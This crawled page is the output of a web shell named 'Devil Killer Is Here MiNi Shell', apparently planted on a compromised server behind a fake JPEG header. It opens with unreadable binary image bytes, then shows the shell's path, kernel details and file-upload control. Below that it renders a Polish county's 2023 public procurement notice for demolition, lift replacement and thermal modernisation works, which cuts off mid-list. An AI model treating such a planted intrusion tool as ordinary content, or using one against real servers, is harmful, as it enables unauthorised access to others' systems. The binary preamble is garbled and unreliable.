JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230315/0013611201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Nowa energia społeczna </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Pińczowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291009432</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zacisze</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pińczów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">413676001</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">starostwo@pinczow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pinczow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Nowa energia społeczna </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-01a03b5e-c29f-11ed-b311-9aae6ad31be8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00136112</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00035639/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Nowa energia społeczna</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-01a03b5e-c29f-11ed-b311-9aae6ad31be8 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej (art. 61 ust. 1 ustawy Pzp).<br/>Komunikacja ustna dopuszczalna jest w toku negocjacji lub dialogu oraz w odniesieniu do informacji, które nie są istotne, w szczególności nie dotyczą ogłoszenia o zamówieniu lub dokumentów zamówienia, potwierdzenia zainteresowania, ofert, o ile jej treść jest udokumentowana (art. 61 ust. 2 ustawy Pzp).<br/>Komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002r. o świadczeniu usług drogą elektroniczną „(Dz.U. z 2020r. poz. 344) tj. za pomocą platformy:<br/>www.ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia o wartości mniejszej niż progi unijne - ofertę, oświadczenie o którym mowa w art. 125 ust. 1 ustawy Pzp (o braku wykluczeń z postępowania i spełnianiu warunków udziału w postępowaniu), składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym (art. 63 ust. 2 ustawy Pzp).<br/>Sposób sporządzania dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">informacja dotycząca przetwarzania danych osobowych, stanowi spełnienie przez administratora obowiązku informacyjnego wynikającego z art. 13. Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PiPR.IV.272.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 5347537,72 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie polega na demontażu komina stalowego nieużytkowanego, zgodnie z załączonym projektem rozbiórki. Przedmiar załączony do dokumentacji pełni jedynie funkcję pomocniczą. <br/>Po stronie Wykonawcy jest utylizacja materiału z demontażu i sprzedaż odzyskanego złomu. Zysk z tego tytułu wykonawca winien uwzględnić w oferowanej cenie odpowiednio ją kalkulując . </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 42871,93 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111300-1 - Roboty rozbiórkowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich wagami (1% - 1 pkt)<br/>2.	Cena 100% maksymalnie 100% (=100 punktów) według wzoru : c= cena najtańszej oferty brutto spośród ofert nie podlegających odrzuceniu / cena badanej (przeliczanej) oferty brutto x 100<br/>Uwaga: Zgodnie z art. 225 ustawy Pzp, jeśli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004r. o podatku od towarów i usług (Dz.U. z 2022. poz. 931 z dnia 2022.04.09) dla celów zastosowania kryterium cena Zamawiający dolicza do przedstawionej ceny kwotę podatku od towarów i usług którą miałby obowiązek rozliczyć.<br/><br/>3.	Oferta najkorzystniejszą zostaje oferta, która uzyska w sumie najwyższą liczbę punktów w ramach powyższych kryteriów<br/>4.	Zamawiający uzna za najkorzystniejszą ofertę wykonawcy, która uzyska największą liczbę punktów. <br/>6.	Liczba punktów, którą można uzyskać w kryterium cena zostanie obliczona wg wzoru:<br/>C = (Cmin ÷ Cx) x 100%<br/>Gdzie:<br/>C – ilość punktów przyznana ocenianej ofercie w ramach kryterium cena za realizację zamówienia<br/>Cmin – najniższa cena brutto zaoferowana w ofertach<br/>Cx – cena brutto oferty ocenianej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie polega na zaprojektowaniu dźwigu w istniejącym szybie, demontażu istniejącego dźwigu oraz dostawie i montażu nowego dźwigu elektrycznego w istniejącym szybie windowym. <br/>Dźwig winien być zaprojektowany zgodnie z aktualnie obowiązującymi przepisami, zaleceniami oraz wytycznymi w Polsce oraz w całej Unii Europejskiej. Przewiduje się iż, wymianie podlegać będą wszystkie podzespoły. <br/>Wciągarki charakteryzować się winny dużą niezawodnością z przeznaczeniem do pracy ciężkiej – 240 (+-20) włączeń na godzinę. <br/>Dźwig winien posiadać:<br/>- falownik, dzięki któremu zmniejszeniu ulegną koszty eksploatacji o 20-30%,<br/>- aparaturę sterową wyposażoną w monitoring dźwigu pozwalający na zdalną diagnozę awarii oraz komunikację z aparaturą sterową za pomocą sieci GSM (automatyczne powiadomienie o przestoju),<br/>- zamontowaną kabinę o optymalnej powierzchni wykorzystującą w pełni przestrzeń w szybie. <br/>Dźwig winien mieć nieograniczony dostęp do części zamiennych innym firm niż producenta, tak by umożliwić Zamawiającemu swobodny wybór ekip konserwujących, prowadzących serwis po cenach rynkowych, a nie narzuconych przez producenta dźwigu, np. po wygaśnięciu okresu gwarancji. <br/>Po wykonaniu prac, dźwigi winny posiadać oznaczenie CE, a więc oznaczenie nowego wyrobu spełniającego wszelkie przepisy i zalecenia Unii Europejskiej.<br/>Dodatkowo wymiana dźwigu winna obejmować:<br/>- montaż drzwi szybowych ognioodpornych EI30 / EI60:<br/>- wykonanie zgodne ze Standardami Dostępności dla polityki spójności 2014-2020<br/>- zgodność z nową Dyrektywą 2014/33/UE oraz Normami EN 81-20 i EN 81-50 obowiązującymi od września 2017 roku. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 292990,19 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42416100-6 - Windy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45313100-5 - Instalowanie wind</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich wagami (1% - 1 pkt)<br/>2.	Cena 60% maksymalnie 60% (=60 punktów) według wzoru : c= cena najtańszej oferty brutto spośród ofert nie podlegających odrzuceniu / cena badanej (przeliczanej) oferty brutto x 60<br/>Uwaga: Zgodnie z art. 225 ustawy Pzp, jeśli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004r. o podatku od towarów i usług (Dz.U. z 2022. poz. 931 z dnia 2022.04.09) dla celów zastosowania kryterium cena Zamawiający dolicza do przedstawionej ceny kwotę podatku od towarów i usług którą miałby obowiązek rozliczyć.<br/>3.	W kryterium „rozszerzenie okresu gwarancji i rękojmi na przedmiot umowy” za każdy dodatkowe dwa lata gwarancji zostaną odpowiednio doliczone punkty:<br/><br/>a.	36 m-cy : 0 punktów (spełnienie warunku)<br/>b.	48 m- cy: 20 punktów<br/>c.	72 m - cy: 40 punktów<br/>UWAGA: W przypadku braku wskazania przez Wykonawcę gwarancji i rękojmi przyjmuje się minimalne okresy i przyznaje „0” punktów.<br/>W przypadku wskazania dłuższego niż 72 m-ce okresu gwarancji - 40 pkt.=40%<br/>4.	Oferta najkorzystniejszą zostaje oferta, która uzyska w sumie najwyższą liczbę punktów w ramach powyższych kryteriów<br/>5.	Zamawiający uzna za najkorzystniejszą ofertę wykonawcy, która uzyska największą łączną liczbę punktów. Łączna ilość punktów dla każdej nie odrzuconej oferty zostanie obliczona według poniższego wzoru:<br/>S=C+G<br/>S – suma punktów oferty<br/>C – liczba punktów oferty uzyskana w kryterium „cena”<br/>G – liczba punktów uzyskana w kryterium „rozszerzenie okresu gwarancji i rękojmi na przedmiot umowy”<br/>6.	Liczba punktów, którą można uzyskać w kryterium cena zostanie obliczona wg wzoru:<br/>C = (Cmin ÷ Cx) x 60%<br/>Gdzie:<br/>C – ilość punktów przyznana ocenianej ofercie w ramach kryterium cena za realizację zamówienia<br/>Cmin – najniższa cena brutto zaoferowana w ofertach<br/>Cx – cena brutto oferty ocenianej<br/>7.	Liczba punktów, którą można uzyskać w kryterium rozszerzenie okresu gwarancji i rękojmi na przedmiot umowy zostanie obliczona według wzoru:<br/>G = (Gbad ÷ Gx) x 40%<br/>Gdzie:<br/>G – ilość punktów przyznana ocenianej ofercie w ramach kryterium rozszerzenie okresu gwarancji i rękojmi na przedmiot umowy<br/>Gbad – okres gwarancji i rękojmi na przedmiot umowy zaoferowany w ofercie badanej<br/>Gx – najdłuższy zaoferowany okres gwarancji i rękojmi na przedmiot umowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rozszerzenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie winno obejmować szeroko pojętą termomodernizację z OZE, prace powinny być zaprojektowane tak by cały system w budynku był spójny i pozwolił na samowystarczalność energetyczną obiektu co najmniej na poziomie 70% zapotrzebowania. W tramach zadania należy zaprojektować wszystkie urządzenia, uzyskać niezbędne zezwolenia na prace, wykonać audyty energetyczne i efektywności energetycznej przed i po wykonaniu, wykonać założoną termomodernizację z OZE.<br/>W zakresie zadania przewiduje się:<br/>ZAKRES I – ujęty w audycie energetycznym i efektywności energetycznej.<br/>1.	Ocieplenie wszystkich przegród zewnętrznych – ścian i dachów, wraz z obróbkami blacharskimi, ogniomurów i kominów, daszków nad wejściami, wymianą orynnowania i rur spustowych, przełożenie i uzupełnieniem instalacji odgromowej. <br/>2.	Wymianę stolarki zewnętrznej – okien i drzwi, wraz z wymianą parapetów zewnętrznych<br/>3.	Modernizacja sieci C.O. i CWU<br/>4.	Montaż kolektorów słonecznych (uzupełnienie istniejącej instalacji)<br/>5.	Montaż paneli fotowoltaicznych<br/>6.	Modernizacja oświetlenia poprzez wymianę opraw i żarówek na typu LED<br/>ZAKRES II <br/>1.	Pompy ciepła (2 przemysłowe)<br/>2.	Magazyn energii<br/>3.	Wymienniki ciepła (3 szt do wymiany)<br/>4.	Magazyn ciepłej wody użytkowej <br/>5.	Zawór trójdrożny na odbiorze wody ciepłej <br/>6.	Wymiana instalacji wodno – kanalizacyjnej w pionach wraz ze zmiękczaczem wody ciepłej <br/>7.	Wymianę tablic elektrycznych. <br/>8.	Wymiana okładzin schodów i pochylni<br/>9.	Wymiana daszku nad wejściem głównym wraz z orynnowaniem </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 4251490,41 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45321000-3 - Izolacja cieplna</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45261215-4 - Pokrywanie dachów panelami ogniw słonecznych</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">51112100-1 - Usługi instalowania sprzętu do przesyłu energii elektrycznej</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71323100-9 - Usługi projektowania systemów zasilania energią elektryczną</p> <p class="mb-0">79930000-2 - Specjalne usługi projektowe</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">31000000-6 - 